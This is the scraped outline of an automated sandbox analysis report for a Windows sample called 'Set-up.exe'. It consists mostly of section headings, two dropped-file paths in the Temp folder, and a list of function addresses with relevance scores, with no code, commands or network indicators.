Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\HwYuaUvXqdEkCixuJard.dll

C:\Users\user\AppData\Local\Temp\service123.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Windows Analysis Report
Set-up.exe

Function 001E116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 001E15B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 6C7614B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 001E81E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116
libraryloaderCOMMON

Function 001E8230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62
libraryloaderCOMMON

Function 001E13C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Function 001E11A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Function 001E1160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Function 6C834230 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Function 001E1296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Function 001E13BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Function 6C77B1A0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Function 6C77B310 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON